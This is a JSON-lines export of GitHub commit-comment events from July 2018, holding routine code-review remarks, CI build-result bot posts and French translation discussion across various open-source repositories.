{"id":"8027447343","type":"CommitCommentEvent","actor":{"login":"b606"},"repo":{"name":"Ludeon/RimWorld-fr"},"payload":{"comment":{"id":29855984,"position":null,"line":null,"path":null,"commit_id":"d3bdedad037592aae3646f0f432c33e116dbdacb","created_at":"2018-07-27T09:08:10Z","updated_at":"2018-07-27T09:08:10Z","author_association":"CONTRIBUTOR","body":"Au lieu de ils/il, on pourrait mettre \"ces animaux\" ?"}},"created_at":"2018-07-27T09:08:10Z"}
{"id":"8027450574","type":"CommitCommentEvent","actor":{"login":"chcao052"},"repo":{"name":"cocodataset/cocoapi"},"payload":{"comment":{"id":29855995,"position":27,"line":23,"path":"PythonAPI/setup.py","commit_id":"2f074ecd262878ecae04897473c1c76df341efa6","created_at":"2018-07-27T09:08:46Z","updated_at":"2018-07-27T09:08:46Z","author_association":"NONE","body":"Any reason for matplotlib>=2.1.0?\r\nI find that matplotlib>=2.0 is fine on linux64  where I has to keep matplotlib>=2.0.2"}},"created_at":"2018-07-27T09:08:46Z"}
{"id":"8027451016","type":"CommitCommentEvent","actor":{"login":"liuqun"},"repo":{"name":"tensorflow/serving"},"payload":{"comment":{"id":29855996,"position":null,"line":null,"path":null,"commit_id":"9824f51c7d1f3f8b199dcfc16b63664023dc15e7","created_at":"2018-07-27T09:08:51Z","updated_at":"2018-07-27T09:08:51Z","author_association":"CONTRIBUTOR","body":"It‘s weird that @tensorflower-gardener added a white space between `#!` and `/usr/bin/env`.\r\n\r\nSee my original commit at https://github.com/tensorflow/serving/commit/5c7aab9d4b862d4356cd1542a8e21bc99a5726a9 which did not have that white space."}},"created_at":"2018-07-27T09:08:51Z"}
{"id":"8027451924","type":"CommitCommentEvent","actor":{"login":"ocornut"},"repo":{"name":"franciscod/imgui"},"payload":{"comment":{"id":29855999,"position":6,"line":1022,"path":"imgui_draw.cpp","commit_id":"fd09b3ad0321fb0134039b13d0398d8462751ee2","created_at":"2018-07-27T09:09:02Z","updated_at":"2018-07-27T09:09:02Z","author_association":"NONE","body":"That part is not acceptable unffortunately, we can't put something as specific as \"resize grip\" in the lower-level ImDrawList API. This code can be kept in imgui.cpp as RenderResizeGrip() is needed."}},"created_at":"2018-07-27T09:09:02Z"}
{"id":"8027454209","type":"CommitCommentEvent","actor":{"login":"jgusih"},"repo":{"name":"jgusih/Curs_android"},"payload":{"comment":{"id":29856004,"position":null,"line":null,"path":null,"commit_id":"bb2c416c7bcf93b3f40ed3e78c4a38ac11169ae9","created_at":"2018-07-27T09:09:28Z","updated_at":"2018-07-27T09:09:28Z","author_association":"OWNER","body":"Carga inicial"}},"created_at":"2018-07-27T09:09:28Z"}
{"id":"8027458336","type":"CommitCommentEvent","actor":{"login":"yu123zhang"},"repo":{"name":"yu123zhang/ESBRSM"},"payload":{"comment":{"id":29856013,"position":null,"line":null,"path":null,"commit_id":"6991f19ecc598757cfa0de78f1e6cd3ad0db78ad","created_at":"2018-07-27T09:10:18Z","updated_at":"2018-07-27T09:10:18Z","author_association":"OWNER","body":"edit the db.sh,and create this sql.txt"}},"created_at":"2018-07-27T09:10:18Z"}
{"id":"8027466251","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29856032,"position":12,"line":12,"path":"include/CObjectCache.h","commit_id":"cf1b26ad2cfa0b20d36272f2705a8588f66afc19","created_at":"2018-07-27T09:11:57Z","updated_at":"2018-07-27T09:11:57Z","author_association":"NONE","body":"put in irr::core"}},"created_at":"2018-07-27T09:11:57Z"}
{"id":"8027468214","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29856040,"position":null,"line":null,"path":null,"commit_id":"609f0a68dd9493a8c90a4deeec0e8eca9dcb24a3","created_at":"2018-07-27T09:12:22Z","updated_at":"2018-07-27T09:12:22Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-27T09:12:22Z"}
{"id":"8027469615","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29856050,"position":null,"line":null,"path":null,"commit_id":"cd8f41aeab471832824c9c7ac9f1d4acabebd8ae","created_at":"2018-07-27T09:12:40Z","updated_at":"2018-07-27T09:12:40Z","author_association":"NONE","body":"Follow-up-to-#6393-SZVAV-for-PTUnit (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2325 of 2326 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nEnergyPlusFixture Test Summary\n * Passed: 652\n * OTHER_FAULT: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-cd8f41aeab471832824c9c7ac9f1d4acabebd8ae-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-cd8f41aeab471832824c9c7ac9f1d4acabebd8ae-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-cd8f41aeab471832824c9c7ac9f1d4acabebd8ae-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.22%25-green.png)</a>\n"}},"created_at":"2018-07-27T09:12:40Z"}
{"id":"8027470374","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29856051,"position":15,"line":15,"path":"include/CObjectCache.h","commit_id":"cf1b26ad2cfa0b20d36272f2705a8588f66afc19","created_at":"2018-07-27T09:12:49Z","updated_at":"2018-07-27T09:12:49Z","author_association":"NONE","body":"can you comment the parameters?"}},"created_at":"2018-07-27T09:12:49Z"}
{"id":"8027470512","type":"CommitCommentEvent","actor":{"login":"rkdarst"},"repo":{"name":"pontiggi/batchspawner"},"payload":{"comment":{"id":29856053,"position":13,"line":48,"path":"batchspawner/batchspawner.py","commit_id":"50428e8676c4e23ad2e65938232a7d7d70a1336a","created_at":"2018-07-27T09:12:51Z","updated_at":"2018-07-27T09:12:51Z","author_association":"NONE","body":"Using an extra dependency isn't ideal - especially one not in conda or conda-forge.\r\n\r\nIf you look at `jupyterhub.utils.random_port`, you see that it also makes sure that the port is free before returning it (by letting OS pick a random free port).  To duplicate that here, seems like you may need to try to bind to each port to see if it works or not.  But also note issue #58 in batchspawner - actually it doesn't matter since random_port runs on a different host than it runs on.  In the grand scheme, these two should be merged somehow."}},"created_at":"2018-07-27T09:12:51Z"}
{"id":"8027470945","type":"CommitCommentEvent","actor":{"login":"magickris93"},"repo":{"name":"tungstenfabric/tungsten-ci-dashboard"},"payload":{"comment":{"id":29856055,"position":23,"line":102,"path":"dashboard/status.py","commit_id":"2fa29084d05f0593d16f5cb5c5bb081116cfdb7a","created_at":"2018-07-27T09:12:57Z","updated_at":"2018-07-27T09:12:57Z","author_association":"CONTRIBUTOR","body":"``failing_results`` is a class constant, so it should be in uppercase"}},"created_at":"2018-07-27T09:12:57Z"}
{"id":"8027472073","type":"CommitCommentEvent","actor":{"login":"elia-senatore-cippest"},"repo":{"name":"pods-framework/pods"},"payload":{"comment":{"id":29856056,"position":null,"line":null,"path":null,"commit_id":"9b4385802895e31567ddb07dcac5218876504b8e","created_at":"2018-07-27T09:13:12Z","updated_at":"2018-07-27T09:13:12Z","author_association":"NONE","body":"For the fixed bug: \"Export all\",,, you forgot to tag me :("}},"created_at":"2018-07-27T09:13:12Z"}
{"id":"8027474982","type":"CommitCommentEvent","actor":{"login":"rkdarst"},"repo":{"name":"pontiggi/batchspawner"},"payload":{"comment":{"id":29856061,"position":22,"line":92,"path":"batchspawner/batchspawner.py","commit_id":"50428e8676c4e23ad2e65938232a7d7d70a1336a","created_at":"2018-07-27T09:13:49Z","updated_at":"2018-07-27T09:13:49Z","author_association":"NONE","body":"To simplify, could directly be a tuple config option?  Then the port_range module isn't needed, and the two bounds are top and bottom.  Less flexibility, but is the extra flexibility needed?"}},"created_at":"2018-07-27T09:13:49Z"}
{"id":"8027476094","type":"CommitCommentEvent","actor":{"login":"ocornut"},"repo":{"name":"franciscod/imgui"},"payload":{"comment":{"id":29856066,"position":123,"line":2356,"path":"imgui_draw.cpp","commit_id":"0321aeb7480263451c7f9a338d95b55d3efebc8b","created_at":"2018-07-27T09:14:03Z","updated_at":"2018-07-27T09:14:03Z","author_association":"NONE","body":"This code can use ImSqrt, ImAbs etc. wrappers. Maybe add ImExp() in necessary (in imgui_internal.h)\r\nBeware you are using constants as double: 0.75, 2.0 should be 0.75f, 2.0f, etc. This will warn with some compiler settings.\r\n\r\nYou may merge the filling and stroked loop if that can make the code shorter."}},"created_at":"2018-07-27T09:14:03Z"}
{"id":"8027476449","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29856069,"position":null,"line":null,"path":null,"commit_id":"cd8f41aeab471832824c9c7ac9f1d4acabebd8ae","created_at":"2018-07-27T09:14:08Z","updated_at":"2018-07-27T09:14:08Z","author_association":"NONE","body":"Follow-up-to-#6393-SZVAV-for-PTUnit (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-cd8f41aeab471832824c9c7ac9f1d4acabebd8ae-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-27T09:14:08Z"}
{"id":"8027477502","type":"CommitCommentEvent","actor":{"login":"Nibsy"},"repo":{"name":"Ludeon/RimWorld-fr"},"payload":{"comment":{"id":29856070,"position":null,"line":null,"path":null,"commit_id":"d3bdedad037592aae3646f0f432c33e116dbdacb","created_at":"2018-07-27T09:14:21Z","updated_at":"2018-07-27T09:14:21Z","author_association":"CONTRIBUTOR","body":"ça me va :) je vais changer. Du coup, une multitude \"est\" ou \"sont\" ? J'ai vérifié, je penche pour \"est\""}},"created_at":"2018-07-27T09:14:21Z"}
{"id":"8027482430","type":"CommitCommentEvent","actor":{"login":"magickris93"},"repo":{"name":"tungstenfabric/tungsten-ci-dashboard"},"payload":{"comment":{"id":29856078,"position":35,"line":276,"path":"tests/test_status.py","commit_id":"2fa29084d05f0593d16f5cb5c5bb081116cfdb7a","created_at":"2018-07-27T09:15:21Z","updated_at":"2018-07-27T09:15:21Z","author_association":"CONTRIBUTOR","body":"I'd suggest to change the name to succeeding\\successful or non_failing"}},"created_at":"2018-07-27T09:15:21Z"}
{"id":"8027491059","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29856094,"position":107,"line":107,"path":"include/CObjectCache.h","commit_id":"cf1b26ad2cfa0b20d36272f2705a8588f66afc19","created_at":"2018-07-27T09:17:08Z","updated_at":"2018-07-27T09:17:08Z","author_association":"NONE","body":"comment out the `ByIndex` functions for now"}},"created_at":"2018-07-27T09:17:08Z"}
{"id":"8027494002","type":"CommitCommentEvent","actor":{"login":"anneihtseme"},"repo":{"name":"anneihtseme/myFirstProject"},"payload":{"comment":{"id":29856098,"position":null,"line":null,"path":null,"commit_id":"6ca06eda428087a5fff5c5c14a9757471d40ce69","created_at":"2018-07-27T09:17:45Z","updated_at":"2018-07-27T09:17:45Z","author_association":"OWNER","body":"def Hi():\r\nprint(\"hi\")"}},"created_at":"2018-07-27T09:17:45Z"}
{"id":"8027494162","type":"CommitCommentEvent","actor":{"login":"crypt3r2"},"repo":{"name":"crypt3r2/test"},"payload":{"comment":{"id":29856099,"position":null,"line":null,"path":null,"commit_id":"a6269d552fd0f4f1c8c3d7bf8f8c91a9b4a7cf67","created_at":"2018-07-27T09:17:46Z","updated_at":"2018-07-27T09:17:46Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-27T09:17:46Z"}
{"id":"8027494387","type":"CommitCommentEvent","actor":{"login":"crypt3r2"},"repo":{"name":"crypt3r2/test"},"payload":{"comment":{"id":29856101,"position":null,"line":null,"path":null,"commit_id":"a6269d552fd0f4f1c8c3d7bf8f8c91a9b4a7cf67","created_at":"2018-07-27T09:17:50Z","updated_at":"2018-07-27T09:17:50Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-27T09:17:50Z"}
{"id":"8027495066","type":"CommitCommentEvent","actor":{"login":"magickris93"},"repo":{"name":"tungstenfabric/tungsten-ci-dashboard"},"payload":{"comment":{"id":29856104,"position":18,"line":253,"path":"tests/test_status.py","commit_id":"2fa29084d05f0593d16f5cb5c5bb081116cfdb7a","created_at":"2018-07-27T09:17:58Z","updated_at":"2018-07-27T09:17:58Z","author_association":"CONTRIBUTOR","body":"You are using only one job each time. Maybe it's better to create one job before the loop, and in it's inside just change the job result."}},"created_at":"2018-07-27T09:17:58Z"}
{"id":"8027496983","type":"CommitCommentEvent","actor":{"login":"infrastation"},"repo":{"name":"RackTables/racktables"},"payload":{"comment":{"id":29856107,"position":null,"line":null,"path":null,"commit_id":"0c1b0b11c930518f5a98cfa826af266105c37bcd","created_at":"2018-07-27T09:18:21Z","updated_at":"2018-07-27T09:18:21Z","author_association":"MEMBER","body":"If \"anymode\" A1 really needs to be implemented, it should be done differently: `apply8021QOrder()` could split \"anymode\" into \"access\" and \"trunk\" and process each with `buildVLANFilter()`, which then no longer process \"anymode\". This may require other code changes.\r\n\r\nFor safety \"anymode\" has been the intersection between \"trunk\" and \"access\", not a union. For \"trunk\", as far as I remember, trying to tag VLAN 1 on a port caused trouble: either the switch refused to do it, or it resulted in unexpected behaviour. That is closely related to the fact RackTables never deletes VLAN 1 from a switch."}},"created_at":"2018-07-27T09:18:21Z"}
{"id":"8027501218","type":"CommitCommentEvent","actor":{"login":"ahsannabi"},"repo":{"name":"ahsannabi/social-network"},"payload":{"comment":{"id":29856113,"position":null,"line":null,"path":null,"commit_id":"df765187a2b2d4959c403f8b6823a72ce6b4c069","created_at":"2018-07-27T09:19:14Z","updated_at":"2018-07-27T09:19:14Z","author_association":"OWNER","body":"`gem \"sanitize\", '4.0.1'`"}},"created_at":"2018-07-27T09:19:14Z"}
{"id":"8027502725","type":"CommitCommentEvent","actor":{"login":"fulldecent"},"repo":{"name":"erc721-class/student-list"},"payload":{"comment":{"id":29856114,"position":null,"line":null,"path":null,"commit_id":"80a27467a42780a5dc09ac6b513e187fc5b4dab1","created_at":"2018-07-27T09:19:31Z","updated_at":"2018-07-27T09:19:31Z","author_association":"CONTRIBUTOR","body":"@arthurmak You have left a comment on proposed change from Angie. Instead, please start over and propose your own change."}},"created_at":"2018-07-27T09:19:31Z"}
{"id":"8027503705","type":"CommitCommentEvent","actor":{"login":"vincentfretin"},"repo":{"name":"assembl/assembl"},"payload":{"comment":{"id":29856118,"position":79,"line":759,"path":"assembl/models/auth.py","commit_id":"60bb78e195a58b55ddcdcf8674d91fe680869e68","created_at":"2018-07-27T09:19:43Z","updated_at":"2018-07-27T09:19:43Z","author_association":"CONTRIBUTOR","body":"It's weird to return a date or boolean here. Why not return None if no date?"}},"created_at":"2018-07-27T09:19:43Z"}
{"id":"8027504402","type":"CommitCommentEvent","actor":{"login":"rkdarst"},"repo":{"name":"pontiggi/batchspawner"},"payload":{"comment":{"id":29856120,"position":41,"line":351,"path":"batchspawner/batchspawner.py","commit_id":"50428e8676c4e23ad2e65938232a7d7d70a1336a","created_at":"2018-07-27T09:19:52Z","updated_at":"2018-07-27T09:19:52Z","author_association":"NONE","body":"I wasn't the one that fix this last time, but this relates to restoring old jobs or backwards compatibilty or some such, and probably shouldn't be inside the new conditional."}},"created_at":"2018-07-27T09:19:52Z"}
{"id":"8027505626","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29856122,"position":143,"line":143,"path":"include/CObjectCache.h","commit_id":"cf1b26ad2cfa0b20d36272f2705a8588f66afc19","created_at":"2018-07-27T09:20:07Z","updated_at":"2018-07-27T09:20:07Z","author_association":"NONE","body":"we need an associative cache, so this is really the only class I want.\r\nIf user has no idea for a key then auto generate one for them (special insert function, or slightly different class)."}},"created_at":"2018-07-27T09:20:07Z"}
{"id":"8027507053","type":"CommitCommentEvent","actor":{"login":"rkdarst"},"repo":{"name":"pontiggi/batchspawner"},"payload":{"comment":{"id":29856125,"position":36,"line":339,"path":"batchspawner/batchspawner.py","commit_id":"50428e8676c4e23ad2e65938232a7d7d70a1336a","created_at":"2018-07-27T09:20:23Z","updated_at":"2018-07-27T09:20:23Z","author_association":"NONE","body":"I think all the new logic could go here only"}},"created_at":"2018-07-27T09:20:23Z"}
{"id":"8027507866","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29856128,"position":166,"line":166,"path":"include/CObjectCache.h","commit_id":"cf1b26ad2cfa0b20d36272f2705a8588f66afc19","created_at":"2018-07-27T09:20:32Z","updated_at":"2018-07-27T09:20:32Z","author_association":"NONE","body":"if object is not found then this may crash, or give garbage"}},"created_at":"2018-07-27T09:20:32Z"}
{"id":"8027508575","type":"CommitCommentEvent","actor":{"login":"dzikoysk"},"repo":{"name":"dzikoysk/Pandomium"},"payload":{"comment":{"id":29856129,"position":null,"line":null,"path":null,"commit_id":"1eaf86e82d416579c1272132272dd415dcf3dd1a","created_at":"2018-07-27T09:20:40Z","updated_at":"2018-07-27T09:20:40Z","author_association":"OWNER","body":"#22"}},"created_at":"2018-07-27T09:20:40Z"}
{"id":"8027511662","type":"CommitCommentEvent","actor":{"login":"b606"},"repo":{"name":"Ludeon/RimWorld-fr"},"payload":{"comment":{"id":29856132,"position":null,"line":null,"path":null,"commit_id":"d3bdedad037592aae3646f0f432c33e116dbdacb","created_at":"2018-07-27T09:21:19Z","updated_at":"2018-07-27T09:21:19Z","author_association":"CONTRIBUTOR","body":"OK pour \"est\".\r\nAucune idée pour multitude. Il y a les deux\r\nhttp://grammaire.reverso.net/4_1_11_accord_du_verbe_avec_un_seul_sujet.shtml\r\n(cf encadré bleu au milieu de la page, je n'ai rien compris...)"}},"created_at":"2018-07-27T09:21:19Z"}
{"id":"8027513800","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29856135,"position":164,"line":164,"path":"include/CObjectCache.h","commit_id":"cf1b26ad2cfa0b20d36272f2705a8588f66afc19","created_at":"2018-07-27T09:21:46Z","updated_at":"2018-07-27T09:21:46Z","author_association":"NONE","body":"getByKey is great, but we also need a function to check if object is in cache by its own pointer (is allowed to be very slow)."}},"created_at":"2018-07-27T09:21:46Z"}
{"id":"8027515526","type":"CommitCommentEvent","actor":{"login":"GitTest1Acc"},"repo":{"name":"GitTest1Acc/TestRepoPublic"},"payload":{"comment":{"id":29856137,"position":null,"line":null,"path":null,"commit_id":"96f7b4ea7fb4c16bfc22c6a51b86a5a94acefa85","created_at":"2018-07-27T09:22:08Z","updated_at":"2018-07-27T09:22:08Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://109.195.189.78:40102/ui#review:id=10)"}},"created_at":"2018-07-27T09:22:08Z"}
{"id":"8027515662","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29856138,"position":143,"line":143,"path":"include/CObjectCache.h","commit_id":"cf1b26ad2cfa0b20d36272f2705a8588f66afc19","created_at":"2018-07-27T09:22:10Z","updated_at":"2018-07-27T09:22:10Z","author_association":"NONE","body":"If we want a cache of pointers only, then we could use the pointer as both the key and the value"}},"created_at":"2018-07-27T09:22:10Z"}
{"id":"8027518550","type":"CommitCommentEvent","actor":{"login":"GitTest1Acc"},"repo":{"name":"GitTest1Acc/TestRepoPublic"},"payload":{"comment":{"id":29856146,"position":null,"line":null,"path":null,"commit_id":"96f7b4ea7fb4c16bfc22c6a51b86a5a94acefa85","created_at":"2018-07-27T09:22:44Z","updated_at":"2018-07-27T09:22:44Z","author_association":"OWNER","body":"Corresponding review in Collaborator has been deleted."}},"created_at":"2018-07-27T09:22:44Z"}
{"id":"8027558302","type":"CommitCommentEvent","actor":{"login":"shaedrich"},"repo":{"name":"foundeo/cfdocs"},"payload":{"comment":{"id":29856204,"position":null,"line":null,"path":null,"commit_id":"13df6b18f45c908e1ed542cc49681c4078ab1de9","created_at":"2018-07-27T09:30:32Z","updated_at":"2018-07-27T09:30:32Z","author_association":"CONTRIBUTOR","body":":+1:"}},"created_at":"2018-07-27T09:30:32Z"}
{"id":"8027560970","type":"CommitCommentEvent","actor":{"login":"kesar"},"repo":{"name":"eosauthority/eosio-watcher-plugin"},"payload":{"comment":{"id":29856211,"position":null,"line":null,"path":null,"commit_id":"ba8a7bd9ad36c36f0440d585ff17272600d9bb9a","created_at":"2018-07-27T09:31:04Z","updated_at":"2018-07-27T09:31:04Z","author_association":"NONE","body":"<3 super good code 👍 "}},"created_at":"2018-07-27T09:31:04Z"}
{"id":"8027565348","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29856216,"position":null,"line":null,"path":null,"commit_id":"15183b39c052da06bfd6ecae742e832f520324a5","created_at":"2018-07-27T09:31:57Z","updated_at":"2018-07-27T09:31:57Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-27T09:31:57Z"}
{"id":"8027567679","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"carboninc/ThinkRuby"},"payload":{"comment":{"id":29856219,"position":141,"line":92,"path":"3/railway_manager.rb","commit_id":"107c8dab6b72b5bfd5838d9fd9071f0aedda97c9","created_at":"2018-07-27T09:32:25Z","updated_at":"2018-07-27T09:32:25Z","author_association":"NONE","body":"А здесь у тебя вернется только последнее значение, предыдущие 2 потеряются. Тут либо через запятую возвращать несколько значений, либо лучше хэшем или массивом"}},"created_at":"2018-07-27T09:32:25Z"}
{"id":"8027573929","type":"CommitCommentEvent","actor":{"login":"tusbar"},"repo":{"name":"amio/badgen-service"},"payload":{"comment":{"id":29856227,"position":null,"line":null,"path":null,"commit_id":"55970a895d56e96871886d73a41e003bc31050be","created_at":"2018-07-27T09:33:41Z","updated_at":"2018-07-27T09:33:41Z","author_association":"CONTRIBUTOR","body":"@amio it’d be nicer if those were white :)"}},"created_at":"2018-07-27T09:33:41Z"}
{"id":"8027578533","type":"CommitCommentEvent","actor":{"login":"amitiden26"},"repo":{"name":"daticahealth/java-tomcat-maven-example"},"payload":{"comment":{"id":29856239,"position":null,"line":null,"path":null,"commit_id":"92fe91330de71bc5e8b877d39fd30de8da6a2b39","created_at":"2018-07-27T09:34:38Z","updated_at":"2018-07-27T09:34:38Z","author_association":"NONE","body":"update "}},"created_at":"2018-07-27T09:34:38Z"}
{"id":"8027583179","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29856248,"position":24,"line":24,"path":"include/CConcurrentObjectCache.h","commit_id":"cf1b26ad2cfa0b20d36272f2705a8588f66afc19","created_at":"2018-07-27T09:35:32Z","updated_at":"2018-07-27T09:35:32Z","author_association":"NONE","body":"you need SlimReaderWriter lock.\r\nYou can use https://github.com/buildaworldnet/IrrlichtBAW/pull/49/files#diff-68ca8090b62a2a8da47df6b343d05d0eR305\r\n\r\nBut then you'd have no need for a `CConcurrentObjectCacheBase` class.\r\n\r\nYou'd need a direct write-lock = `AtomicCounterBlock` when doing `CConcurrentObjectCache::insert` or `CConcurrentObjectCache::remove`\r\nBut when doing `CConcurrentObjectCache::get*` then you need an `AtomicCounterIncr`\r\n\r\nAs long as you don't have a conditional insert, you don't need to worry about lock upgrade or downgrade."}},"created_at":"2018-07-27T09:35:32Z"}
{"id":"8027584014","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29856250,"position":null,"line":null,"path":null,"commit_id":"9655ee264b3c2db52e7cf57fe0d73e331d2e9461","created_at":"2018-07-27T09:35:42Z","updated_at":"2018-07-27T09:35:42Z","author_association":"NONE","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2344 of 2344 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9655ee264b3c2db52e7cf57fe0d73e331d2e9461-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9655ee264b3c2db52e7cf57fe0d73e331d2e9461-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-27T09:35:42Z"}
{"id":"8027589297","type":"CommitCommentEvent","actor":{"login":"jmel0001"},"repo":{"name":"jmel0001/repositorytest"},"payload":{"comment":{"id":29856256,"position":null,"line":null,"path":null,"commit_id":"3a210f6c9747396c623063584a214975a13b996e","created_at":"2018-07-27T09:36:47Z","updated_at":"2018-07-27T09:36:47Z","author_association":"OWNER","body":"Really fun stuff! \r\n![p_20180703_112007_bf](https://user-images.githubusercontent.com/19230158/43313637-9f9dc0fa-915e-11e8-8cc7-11503d3d6b93.jpg)  \r\n\r\n\r\n"}},"created_at":"2018-07-27T09:36:47Z"}
{"id":"8027592364","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29856259,"position":24,"line":24,"path":"include/CConcurrentObjectCache.h","commit_id":"cf1b26ad2cfa0b20d36272f2705a8588f66afc19","created_at":"2018-07-27T09:37:25Z","updated_at":"2018-07-27T09:37:25Z","author_association":"NONE","body":"This is so multiple threads can retrieve from the cache, but they handle updating the cache container with exclusivity."}},"created_at":"2018-07-27T09:37:25Z"}
{"id":"8027592401","type":"CommitCommentEvent","actor":{"login":"lotchi"},"repo":{"name":"lotchi/association"},"payload":{"comment":{"id":29856260,"position":null,"line":null,"path":null,"commit_id":"fe6647a8b283aaa7e34dc910bbf6a52fcd0a4164","created_at":"2018-07-27T09:37:25Z","updated_at":"2018-07-27T09:37:25Z","author_association":"OWNER","body":"fff"}},"created_at":"2018-07-27T09:37:25Z"}
{"id":"8027596749","type":"CommitCommentEvent","actor":{"login":"StoniVR"},"repo":{"name":"Fishbiter/gz3doom"},"payload":{"comment":{"id":29856268,"position":null,"line":null,"path":null,"commit_id":"6fe9850d9a0e0674ac0f5c632dc5eabff308f8e2","created_at":"2018-07-27T09:38:19Z","updated_at":"2018-07-27T09:38:19Z","author_association":"NONE","body":"i was wrong it was my steam vr. i dont´no its work. No Thank  4 all this. I got a great Time, becourse of you. "}},"created_at":"2018-07-27T09:38:19Z"}
{"id":"8027597439","type":"CommitCommentEvent","actor":{"login":"pingencom"},"repo":{"name":"pingencom/pingen"},"payload":{"comment":{"id":29856269,"position":null,"line":null,"path":null,"commit_id":"799734311ffd94011f1d6dddaaa0a4435c9557b0","created_at":"2018-07-27T09:38:27Z","updated_at":"2018-07-27T09:38:27Z","author_association":"OWNER","body":"Absolutely right. We have introduced a bug here, and will be pushing v 1.2.4 in a few minutes with this fix."}},"created_at":"2018-07-27T09:38:27Z"}
